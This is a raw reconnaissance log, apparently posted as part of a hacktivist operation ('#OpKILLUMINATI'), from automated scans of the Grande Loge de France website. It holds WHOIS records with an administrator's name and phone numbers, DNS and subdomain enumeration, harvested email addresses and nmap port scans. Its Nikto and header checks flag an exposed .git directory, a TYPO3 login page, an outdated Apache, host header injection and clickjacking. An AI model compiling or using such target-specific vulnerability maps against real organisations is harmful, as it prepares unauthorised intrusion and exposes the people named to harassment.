Anonymous V.S BlackHats JTSEC full recon #OpKILLUMINATI #2

1. #######################################################################################################################################
2. Hostname www.gldf.org ISP OVH S (AS16276)
3. Continent Europe Flag
4. FR
5. Country France Country Code FR (FRA)
6. Region Unknown Local time 05 Jan 2018 22:02 CET
7. City Unknown Latitude 48.858
8. IP Address 51.254.204.201 Longitude 2.339
9. ######################################################################################################################################
10. [i] Scanning Site: https://gldf.org
11.  
12.  
13.  
14. B A S I C I N F O
15. ====================
16.  
17.  
18. [+] Site Title: Franc-Maçonnerie en Grande Loge De France - Accueil
19. [+] IP address: 51.254.204.201
20. [+] Web Server: Apache/2.2.22 (Debian)
21. [+] CMS: Could Not Detect
22. [+] Cloudflare: Not Detected
23. [+] Robots File: Found
24.  
25. -------------[ contents ]----------------
26. # Version2.0
27.  
28. User-agent: *
29. Allow: / # Allow bot to enter
30.  
31. Disallow: /fileadmin/ # Nothing to see here
32. Disallow: /t3lib/ # Nothing to see here
33. Disallow: /typo3/ # Nothing to see here
34. Disallow: /*&type=98 # Disable print pages
35.  
36. Sitemap: https://www.gldf.org/sitemap.xml # Your Sitemap
37.  
38. -----------[end of contents]-------------
39.  
40.  
41.  
42. W H O I S L O O K U P
43. ========================
44.  
45. Domain Name: GLDF.ORG
46. Registry Domain ID: D1730289-LROR
47. Registrar WHOIS Server: whois.ovh.net
48. Registrar URL: http://www.ovh.com
49. Updated Date: 2017-05-01T17:30:13Z
50. Creation Date: 1997-06-17T04:00:00Z
51. Registry Expiry Date: 2018-06-16T04:00:00Z
52. Registrar Registration Expiration Date:
53. Registrar: OVH
54. Registrar IANA ID: 433
55. Registrar Abuse Contact Email: abuse@ovh.net
56. Registrar Abuse Contact Phone: +33.972101007
57. Reseller:
58. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
59. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
60. Registry Registrant ID: C192480019-LROR
61. Registrant Name: Grand Secretaire
62. Registrant Organization: Grande Loge de France
63. Registrant Street: 8 rue Puteaux
64. Registrant City: Paris
65. Registrant State/Province:
66. Registrant Postal Code: 75017
67. Registrant Country: FR
68. Registrant Phone: +33.153426180
69. Registrant Phone Ext:
70. Registrant Fax:
71. Registrant Fax Ext:
72. Registrant Email: pen5yezcffo1y53l3mjy@z.o-w-o.info
73. Registry Admin ID: C192480023-LROR
74. Admin Name: Christian Braut
75. Admin Organization: Archipel Studios
76. Admin Street: Villa Transat
77. Admin City: Louveciennes
78. Admin State/Province:
79. Admin Postal Code: 78430
80. Admin Country: FR
81. Admin Phone: +33.130826764
82. Admin Phone Ext:
83. Admin Fax: +33.130822464
84. Admin Fax Ext:
85. Admin Email: o05z06d2id1qmsocdth6@k.o-w-o.info
86. Registry Tech ID: C192480025-LROR
87. Tech Name: Grand Secretaire
88. Tech Organization: Grande Loge de France
89. Tech Street: 8 rue Puteaux
90. Tech City: Paris
91. Tech State/Province:
92. Tech Postal Code: 75017
93. Tech Country: FR
94. Tech Phone: +33.153426180
95. Tech Phone Ext:
96. Tech Fax:
97. Tech Fax Ext:
98. Tech Email: e8xhcipl9ewqeqdu7r1b@x.o-w-o.info
99. Name Server: NS.OVH.NET
100. Name Server: DNS.OVH.NET
101. DNSSEC: unsigned
102. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
103. >>> Last update of WHOIS database: 2018-01-05T21:09:36Z <<<
104.  
105. For more information on Whois status codes, please visit https://icann.org/epp
106.  
107.  
108.  
109.  
110.  
111. G E O I P L O O K U P
112. =========================
113.  
114. [i] IP Address: 51.254.204.201
115. [i] Country: FR
116. [i] State: N/A
117. [i] City: N/A
118. [i] Latitude: 48.858200
119. [i] Longitude: 2.338700
120.  
121.  
122.  
123.  
124. H T T P H E A D E R S
125. =======================
126.  
127.  
128. [i] HTTP/1.1 301 Moved Permanently
129. [i] Date: Fri, 05 Jan 2018 21:10:37 GMT
130. [i] Server: Apache/2.2.22 (Debian)
131. [i] Location: https://www.gldf.org/
132. [i] Vary: Accept-Encoding
133. [i] Content-Length: 0
134. [i] Connection: close
135. [i] Content-Type: text/html; charset=UTF-8
136. [i] HTTP/1.1 200 OK
137. [i] Date: Fri, 05 Jan 2018 21:10:37 GMT
138. [i] Server: Apache/2.2.22 (Debian)
139. [i] Content-Length: 46592
140. [i] Vary: Accept-Encoding
141. [i] Connection: close
142. [i] Content-Type: text/html; charset=utf-8
143.  
144.  
145.  
146.  
147. D N S L O O K U P
148. ===================
149.  
150. gldf.org. 3599 IN SOA dns.ovh.net. tech.ovh.net. 2017012301 86400 3600 3600000 86400
151. gldf.org. 3599 IN NS dns.ovh.net.
152. gldf.org. 3599 IN NS ns.ovh.net.
153. gldf.org. 3599 IN MX 10 messagerie.gldf.org.
154. gldf.org. 3599 IN MX 5 gldf-org.mail.eo.outlook.com.
155. gldf.org. 3599 IN A 51.254.204.201
156. gldf.org. 3599 IN TXT "MS=ms81514459"
157. gldf.org. 3599 IN TXT "v=spf1 a mx ip4:37.187.49.1 include:spf.mailjet.com ?all"
158.  
159.  
160.  
161.  
162. S U B N E T C A L C U L A T I O N
163. ====================================
164.  
165. Address = 51.254.204.201
166. Network = 51.254.204.201 / 32
167. Netmask = 255.255.255.255
168. Broadcast = not needed on Point-to-Point links
169. Wildcard Mask = 0.0.0.0
170. Hosts Bits = 0
171. Max. Hosts = 1 (2^0 - 0)
172. Host Range = { 51.254.204.201 - 51.254.204.201 }
173.  
174.  
175.  
176. N M A P P O R T S C A N
177. ============================
178.  
179.  
180. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-05 21:10 UTC
181. Nmap scan report for gldf.org (51.254.204.201)
182. Host is up (0.081s latency).
183. rDNS record for 51.254.204.201: 201.ip-51-254-204.eu
184. PORT STATE SERVICE VERSION
185. 21/tcp filtered ftp
186. 22/tcp filtered ssh
187. 23/tcp filtered telnet
188. 25/tcp filtered smtp
189. 80/tcp open http Apache httpd 2.2.22 ((Debian))
190. 110/tcp filtered pop3
191. 143/tcp filtered imap
192. 443/tcp open ssl/http Apache httpd 2.2.22
193. 445/tcp filtered microsoft-ds
194. 3389/tcp filtered ms-wbt-server
195. Service Info: Host: www.gldf.org
196.  
197. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
198. Nmap done: 1 IP address (1 host up) scanned in 14.79 seconds
199. [!] IP Address : 51.254.204.201
200. [+] Operating System : Debian
201. [!] www.gldf.org doesn't seem to use a CMS
202. [+] Honeypot Probabilty: 0%
203. ----------------------------------------
204. PORT STATE SERVICE VERSION
205. 21/tcp filtered ftp
206. 22/tcp filtered ssh
207. 23/tcp filtered telnet
208. 25/tcp filtered smtp
209. 80/tcp open http Apache httpd 2.2.22 ((Debian))
210. 110/tcp filtered pop3
211. 143/tcp filtered imap
212. 443/tcp open ssl/http Apache httpd 2.2.22 ((Debian))
213. 445/tcp filtered microsoft-ds
214. 3389/tcp filtered ms-wbt-server
215. ----------------------------------------
216.  
217. [+] DNS Records
218. dns.ovh.net. (213.186.33.102) AS16276 OVH SAS France
219. ns.ovh.net. (213.251.128.136) AS16276 OVH SAS France
220.  
221. [+] MX Records
222. 5 (213.199.180.138) AS8075 Microsoft Corporation Netherlands
223.  
224. [+] Host Records (A)
225. www.gldf.orgHTTP: (201.ip-51-254-204.eu) (51.254.204.201) AS16276 OVH SAS France
226.  
227. [+] TXT Records
228. "MS=ms81514459"
229. "v=spf1 a mx ip4:37.187.49.1 include:spf.mailjet.com ?all"
230.  
231. [+] DNS Map: https://dnsdumpster.com/static/map/www.gldf.org.png
232.  
233. [>] Initiating 3 intel modules
234. [>] Loading Alpha module (1/3)
235. [>] Beta module deployed (2/3)
236. [>] Gamma module initiated (3/3)
237.  
238. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
239. Server: 192.168.1.254
240. Address: 192.168.1.254#53
241.  
242. Non-authoritative answer:
243. Name: gldf.org
244. Address: 51.254.204.201
245.  
246. gldf.org has address 51.254.204.201
247. gldf.org mail is handled by 10 messagerie.gldf.org.
248. gldf.org mail is handled by 5 gldf-org.mail.eo.outlook.com.
249.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
250.  
251. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
252.  
253. [+] Target is gldf.org
254. [+] Loading modules.
255. [+] Following modules are loaded:
256. [x] [1] ping:icmp_ping - ICMP echo discovery module
257. [x] [2] ping:tcp_ping - TCP-based ping discovery module
258. [x] [3] ping:udp_ping - UDP-based ping discovery module
259. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
260. [x] [5] infogather:portscan - TCP and UDP PortScanner
261. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
262. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
263. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
264. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
265. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
266. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
267. [x] [12] fingerprint:smb - SMB fingerprinting module
268. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
269. [+] 13 modules registered
270. [+] Initializing scan engine
271. [+] Running scan engine
272. [-] ping:tcp_ping module: no closed/open TCP ports known on 51.254.204.201. Module test failed
273. [-] ping:udp_ping module: no closed/open UDP ports known on 51.254.204.201. Module test failed
274. [-] No distance calculation. 51.254.204.201 appears to be dead or no ports known
275. [+] Host: 51.254.204.201 is down (Guess probability: 0%)
276. [+] Cleaning up scan engine
277. [+] Modules deinitialized
278. [+] Execution completed.
279.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
280. Domain Name: GLDF.ORG
281. Registry Domain ID: D1730289-LROR
282. Registrar WHOIS Server: whois.ovh.net
283. Registrar URL: http://www.ovh.com
284. Updated Date: 2017-05-01T17:30:13Z
285. Creation Date: 1997-06-17T04:00:00Z
286. Registry Expiry Date: 2018-06-16T04:00:00Z
287. Registrar Registration Expiration Date:
288. Registrar: OVH
289. Registrar IANA ID: 433
290. Registrar Abuse Contact Email: abuse@ovh.net
291. Registrar Abuse Contact Phone: +33.972101007
292. Reseller:
293. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
294. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
295. Registry Registrant ID: C192480019-LROR
296. Registrant Name: Grand Secretaire
297. Registrant Organization: Grande Loge de France
298. Registrant Street: 8 rue Puteaux
299. Registrant City: Paris
300. Registrant State/Province:
301. Registrant Postal Code: 75017
302. Registrant Country: FR
303. Registrant Phone: +33.153426180
304. Registrant Phone Ext:
305. Registrant Fax:
306. Registrant Fax Ext:
307. Registrant Email: pen5yezcffo1y53l3mjy@z.o-w-o.info
308. Registry Admin ID: C192480023-LROR
309. Admin Name: Christian Braut
310. Admin Organization: Archipel Studios
311. Admin Street: Villa Transat
312. Admin City: Louveciennes
313. Admin State/Province:
314. Admin Postal Code: 78430
315. Admin Country: FR
316. Admin Phone: +33.130826764
317. Admin Phone Ext:
318. Admin Fax: +33.130822464
319. Admin Fax Ext:
320. Admin Email: o05z06d2id1qmsocdth6@k.o-w-o.info
321. Registry Tech ID: C192480025-LROR
322. Tech Name: Grand Secretaire
323. Tech Organization: Grande Loge de France
324. Tech Street: 8 rue Puteaux
325. Tech City: Paris
326. Tech State/Province:
327. Tech Postal Code: 75017
328. Tech Country: FR
329. Tech Phone: +33.153426180
330. Tech Phone Ext:
331. Tech Fax:
332. Tech Fax Ext:
333. Tech Email: e8xhcipl9ewqeqdu7r1b@x.o-w-o.info
334. Name Server: NS.OVH.NET
335. Name Server: DNS.OVH.NET
336. DNSSEC: unsigned
337. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
338. >>> Last update of WHOIS database: 2018-01-05T21:04:06Z <<<
339.  
340. For more information on Whois status codes, please visit https://icann.org/epp
341.  
342. Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
343.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
344.  
345. *******************************************************************
346. * *
347. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
348. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
349. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
350. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
351. * *
352. * TheHarvester Ver. 2.7 *
353. * Coded by Christian Martorella *
354. * Edge-Security Research *
355. * cmartorella@edge-security.com *
356. *******************************************************************
357.  
358.  
359. Full harvest..
360. [-] Searching in Google..
361. Searching 0 results...
362. Searching 100 results...
363. Searching 200 results...
364. [-] Searching in PGP Key server..
365. [-] Searching in Bing..
366. Searching 50 results...
367. Searching 100 results...
368. Searching 150 results...
369. Searching 200 results...
370. [-] Searching in Exalead..
371. Searching 50 results...
372. Searching 100 results...
373. Searching 150 results...
374. Searching 200 results...
375. Searching 250 results...
376.  
377.  
378. [+] Emails found:
379. ------------------
380. bibliotheque@gldf.org
381. communication@gldf.org
382. info@gldf.org
383. lejournal@gldf.org
384. mab@gldf.org
385. secretariat@gldf.org
386.  
387. [+] Hosts found in search engines:
388. ------------------------------------
389. [-] Resolving hostnames IPs...
390. 37.187.49.1:loges.gldf.org
391. 51.254.204.201:www.gldf.org
392. [+] Virtual hosts:
393. ==================
394. 51.254.204.201 www.gldf.org
395.  
396. ******************************************************
397. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
398. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
399. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
400. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
401. * |___/ *
402. * Metagoofil Ver 2.2 *
403. * Christian Martorella *
404. * Edge-Security.com *
405. * cmartorella_at_edge-security.com *
406. ******************************************************
407.  
408. [-] Starting online search...
409.  
410. [-] Searching for doc files, with a limit of 200
411. Searching 100 results...
412. Searching 200 results...
413. Results: 0 files found
414. Starting to download 50 of them:
415. ----------------------------------------
416.  
417.  
418. [-] Searching for pdf files, with a limit of 200
419. Searching 100 results...
420. Searching 200 results...
421. Results: 0 files found
422. Starting to download 50 of them:
423. ----------------------------------------
424.  
425.  
426. [-] Searching for xls files, with a limit of 200
427. Searching 100 results...
428. Searching 200 results...
429. Results: 0 files found
430. Starting to download 50 of them:
431. ----------------------------------------
432.  
433.  
434. [-] Searching for csv files, with a limit of 200
435. Searching 100 results...
436. Searching 200 results...
437. Results: 0 files found
438. Starting to download 50 of them:
439. ----------------------------------------
440.  
441.  
442. [-] Searching for txt files, with a limit of 200
443. Searching 100 results...
444. Searching 200 results...
445. Results: 0 files found
446. Starting to download 50 of them:
447. ----------------------------------------
448.  
449. processing
450. user
451. email
452.  
453. [+] List of users found:
454. --------------------------
455.  
456. [+] List of software found:
457. -----------------------------
458.  
459. [+] List of paths and servers found:
460. ---------------------------------------
461.  
462. [+] List of e-mails found:
463. ----------------------------
464.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
465.  
466. ; <<>> DiG 9.11.2-5-Debian <<>> -x gldf.org
467. ;; global options: +cmd
468. ;; Got answer:
469. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 51531
470. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
471.  
472. ;; OPT PSEUDOSECTION:
473. ; EDNS: version: 0, flags:; udp: 4096
474. ;; QUESTION SECTION:
475. ;org.gldf.in-addr.arpa. IN PTR
476.  
477. ;; AUTHORITY SECTION:
478. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102523 1800 900 604800 3600
479.  
480. ;; Query time: 699 msec
481. ;; SERVER: 192.168.1.254#53(192.168.1.254)
482. ;; WHEN: Fri Jan 05 16:05:48 EST 2018
483. ;; MSG SIZE rcvd: 118
484.  
485. dnsenum VERSION:1.2.4
486. 
487. ----- gldf.org -----
488. 
489.  
490. Host's addresses:
491. __________________
492.  
493. gldf.org. 3248 IN A 51.254.204.201
494. 
495.  
496. Name Servers:
497. ______________
498.  
499. dns.ovh.net. 900 IN A 213.186.33.102
500. ns.ovh.net. 900 IN A 213.251.128.136
501. 
502.  
503. Mail (MX) Servers:
504. ___________________
505.  
506. gldf-org.mail.eo.outlook.com. 10 IN A 213.199.154.42
507. gldf-org.mail.eo.outlook.com. 10 IN A 213.199.180.138
508. 
509.  
510. Trying Zone Transfers and getting Bind Versions:
511. _________________________________________________
512.  
513. 
514. Trying Zone Transfer for gldf.org on dns.ovh.net ...
515.  
516. Trying Zone Transfer for gldf.org on ns.ovh.net ...
517.  
518. brute force file not specified, bay.
519.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
520. 
521. ____ _ _ _ _ _____
522. / ___| _ _| |__ | (_)___| |_|___ / _ __
523. \___ \| | | | '_ \| | / __| __| |_ \| '__|
524. ___) | |_| | |_) | | \__ \ |_ ___) | |
525. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
526.  
527. # Coded By Ahmed Aboul-Ela - @aboul3la
528.  
529. [-] Enumerating subdomains now for gldf.org
530. [-] verbosity is enabled, will show the subdomains results in realtime
531. [-] Searching now in Baidu..
532. [-] Searching now in Yahoo..
533. [-] Searching now in Google..
534. [-] Searching now in Bing..
535. [-] Searching now in Ask..
536. [-] Searching now in Netcraft..
537. [-] Searching now in DNSdumpster..
538. [-] Searching now in Virustotal..
539. [-] Searching now in ThreatCrowd..
540. [-] Searching now in SSL Certificates..
541. [-] Searching now in PassiveDNS..
542. Virustotal: www.loges.gldf.org
543. Virustotal: pvi.gldf.org
544. Virustotal: newsletter.gldf.org
545. Virustotal: rrll.gldf.org
546. Virustotal: loges.gldf.org
547. Virustotal: extranet.gldf.org
548. Virustotal: www.gldf.org
549. ThreatCrowd: newsletter.gldf.org
550. ThreatCrowd: extranet.gldf.org
551. ThreatCrowd: www.gldf.org
552. SSL Certificates: nuage.gldf.org
553. SSL Certificates: www.gldf.org
554. SSL Certificates: rrll.gldf.org
555. SSL Certificates: loges.gldf.org
556. Bing: www.gldf.org
557. Yahoo: www.gldf.org
558. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-gldf.org.txt
559. [-] Total Unique Subdomains Found: 8
560. www.gldf.org
561. extranet.gldf.org
562. loges.gldf.org
563. www.loges.gldf.org
564. newsletter.gldf.org
565. nuage.gldf.org
566. pvi.gldf.org
567. rrll.gldf.org
568.  
569.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
570.  ║ ╠╦╝ ║ ╚═╗╠═╣
571.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
572.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
573. 
574.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-gldf.org-full.txt
575. 
576.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
577.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
578.  
579.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
580. PING gldf.org (51.254.204.201) 56(84) bytes of data.
581.  
582. --- gldf.org ping statistics ---
583. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
584.  
585.  
586.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
587.  
588. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 16:06 EST
589. Nmap scan report for gldf.org (51.254.204.201)
590. Host is up (0.11s latency).
591. rDNS record for 51.254.204.201: 201.ip-51-254-204.eu
592. Not shown: 471 filtered ports
593. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
594. PORT STATE SERVICE
595. 80/tcp open http
596. 443/tcp open https
597.  
598. Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
599.  
600.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
601.  + -- --=[Port 21 closed... skipping.
602.  + -- --=[Port 22 closed... skipping.
603.  + -- --=[Port 23 closed... skipping.
604.  + -- --=[Port 25 closed... skipping.
605.  + -- --=[Port 53 closed... skipping.
606.  + -- --=[Port 79 closed... skipping.
607.  + -- --=[Port 80 opened... running tests...
608.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
609.  
610. ^ ^
611. _ __ _ ____ _ __ _ _ ____
612. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
613. | V V // o // _/ | V V // 0 // 0 // _/
614. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
615. <
616. ...'
617.  
618. WAFW00F - Web Application Firewall Detection Tool
619.  
620. By Sandro Gauci && Wendel G. Henrique
621.  
622. Checking http://gldf.org
623.  
624.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
625. http://gldf.org [301 Moved Permanently] Apache[2.2.22], Country[UNITED KINGDOM][GB], HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[51.254.204.201], RedirectLocation[https://www.gldf.org/]
626. https://www.gldf.org/ [200 OK] Apache[2.2.22], Country[UNITED KINGDOM][GB], Google-Analytics[UA-3901121-1], HTML5, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[51.254.204.201], JQuery[1.8.3], MetaGenerator[TYPO3 CMS], Modernizr, PoweredBy[TYPO3], Script[text/javascript], probably TYPO3, Title[Franc-Maçonnerie en Grande Loge De France - Accueil]
627.  
628.  __ ______ _____ 
629.  \ \/ / ___|_ _|
630.  \ /\___ \ | | 
631.  / \ ___) || | 
632.  /_/\_|____/ |_| 
633.  
634. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
635. + -- --=[Target: gldf.org:80
636. + -- --=[Site not vulnerable to Cross-Site Tracing!
637. + -- --=[Site vulnerable to Host Header Injection!
638. + -- --=[Site vulnerable to Cross-Frame Scripting!
639. + -- --=[Site vulnerable to Clickjacking!
640.  
641. HTTP/1.1 405 Method Not Allowed
642. Date: Fri, 05 Jan 2018 21:06:41 GMT
643. Server: Apache/2.2.22 (Debian)
644. Allow:
645. Vary: Accept-Encoding
646. Content-Length: 297
647. Content-Type: text/html; charset=iso-8859-1
648.  
649. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
650. <html><head>
651. <title>405 Method Not Allowed</title>
652. </head><body>
653. <h1>Method Not Allowed</h1>
654. <p>The requested method TRACE is not allowed for the URL /.</p>
655. <hr>
656. <address>Apache/2.2.22 (Debian) Server at gldf.org Port 80</address>
657. </body></html>
658. 
659. HTTP/1.1 301 Moved Permanently
660. Date: Fri, 05 Jan 2018 21:06:41 GMT
661. Server: Apache/2.2.22 (Debian)
662. Location: https://www.gldf.org/
663. Vary: Accept-Encoding
664. Content-Length: 0
665. Content-Type: text/html; charset=UTF-8
666.  
667. 
668.  
669.  
670.  
671.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
672. + -- --=[Checking if X-Content options are enabled on gldf.org... 
673.  
674. + -- --=[Checking if X-Frame options are enabled on gldf.org... 
675.  
676. + -- --=[Checking if X-XSS-Protection header is enabled on gldf.org... 
677.  
678. + -- --=[Checking HTTP methods on gldf.org... 
679.  
680. + -- --=[Checking if TRACE method is enabled on gldf.org... 
681.  
682. + -- --=[Checking for META tags on gldf.org... 
683.  
684. + -- --=[Checking for open proxy on gldf.org... 
685. <script src="/typo3conf/ext/powermail/Resources/Public/JavaScripts/Powermail/Tabs.js?1458314523" type="text/javascript"></script>
686. <script src="/typo3conf/ext/powermail/Resources/Public/JavaScripts/Powermail/Form.js?1458314523" type="text/javascript"></script>
687. <script src="/typo3conf/ext/cl_jquery_fancybox/Resources/Public/JavaScript/jquery.mousewheel-3.0.6.pack.js?1440501702" type="text/javascript"></script>
688. <script src="/typo3conf/ext/cl_jquery_fancybox/Resources/Public/JavaScript/jquery.fancybox.js?1440501702" type="text/javascript"></script>
689. <script src="/typo3conf/ext/cl_jquery_fancybox/Resources/Public/JavaScript/helper.js?1444724732" type="text/javascript"></script>
690. <script src="/typo3temp/javascript_6c0a5b3afe.js?1511792628" type="text/javascript"></script>
691.  
692.  
693. </body>
694. </html>
695. + -- --=[Enumerating software on gldf.org... 
696. Server: Apache/2.2.22 (Debian)
697.  
698. + -- --=[Checking if Strict-Transport-Security is enabled on gldf.org... 
699.  
700. + -- --=[Checking for Flash cross-domain policy on gldf.org... 
701. <html><head>
702. <title>400 Bad Request</title>
703. </head><body>
704. <h1>Bad Request</h1>
705. <p>Your browser sent a request that this server could not understand.<br />
706. </p>
707. <hr>
708. <address>Apache/2.2.22 (Debian) Server at www.gldf.org Port 80</address>
709. </body></html>
710.  
711.  
712. + -- --=[Checking for Silverlight cross-domain policy on gldf.org... 
713. <html><head>
714. <title>400 Bad Request</title>
715. </head><body>
716. <h1>Bad Request</h1>
717. <p>Your browser sent a request that this server could not understand.<br />
718. </p>
719. <hr>
720. <address>Apache/2.2.22 (Debian) Server at www.gldf.org Port 80</address>
721. </body></html>
722.  
723.  
724. + -- --=[Checking for HTML5 cross-origin resource sharing on gldf.org... 
725.  
726. + -- --=[Retrieving robots.txt on gldf.org... 
727.  
728. User-agent: *
729. Allow: / # Allow bot to enter
730.  
731. Disallow: /fileadmin/ # Nothing to see here
732. Disallow: /t3lib/ # Nothing to see here
733. Disallow: /typo3/ # Nothing to see here
734. Disallow: /*&type=98 # Disable print pages
735.  
736. Sitemap: https://www.gldf.org/sitemap.xml # Your Sitemap
737.  
738. + -- --=[Retrieving sitemap.xml on gldf.org... 
739.  
740. + -- --=[Checking cookie attributes on gldf.org... 
741.  
742. + -- --=[Checking for ASP.NET Detailed Errors on gldf.org... 
743.  
744. 
745.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
746. - Nikto v2.1.6
747. ---------------------------------------------------------------------------
748. + Target IP: 51.254.204.201
749. + Target Hostname: gldf.org
750. + Target Port: 80
751. + Start Time: 2018-01-05 16:06:48 (GMT-5)
752. ---------------------------------------------------------------------------
753. + Server: Apache/2.2.22 (Debian)
754. + The anti-clickjacking X-Frame-Options header is not present.
755. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
756. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
757. + Root page / redirects to: https://www.gldf.org/
758. + Server leaks inodes via ETags, header found with file /robots.txt, inode: 84820, size: 428, mtime: Wed Dec 7 12:05:00 2016
759. + Entry '/ /' in robots.txt returned a non-forbidden or redirect HTTP code (301)
760. + Cookie PHPSESSID created without the httponly flag
761. + Entry '/typo3/ /' in robots.txt returned a non-forbidden or redirect HTTP code (200)
762. + "robots.txt" contains 5 entries which should be manually viewed.
763. + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
764. + OSVDB-3092: /LICENSE.txt: License file found may identify site software.
765. + OSVDB-3233: /icons/README: Apache default file found.
766. + /typo3/: TYPO3 login found
767. + OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
768. + /.git/HEAD: Git HEAD file found. Full repo details may be present.
769. + /.git/config: Git config file found. Infos about repo details may be present.
770. + OSVDB-3093: /typo3_src/ChangeLog: TYPO3 ChangeLog file found.
771. + 8313 requests: 0 error(s) and 16 item(s) reported on remote host
772. + End Time: 2018-01-05 16:48:10 (GMT-5) (2482 seconds)
773. ---------------------------------------------------------------------------
774. + 1 host(s) tested
775.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
776. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/gldf.org-port80.jpg
777.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
778.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
779.  
780.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
781.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
782.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
783.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
784.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
785.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
786.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
787.  
788. __[ ! ] Neither war between hackers, nor peace for the system.
789. __[ ! ] http://blog.inurl.com.br
790. __[ ! ] http://fb.com/InurlBrasil
791. __[ ! ] http://twitter.com/@googleinurl
792. __[ ! ] http://github.com/googleinurl
793. __[ ! ] Current PHP version::[ 7.0.26-1 ]
794. __[ ! ] Current script owner::[ root ]
795. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
796. __[ ! ] Current pwd::[ /usr/share/sniper ]
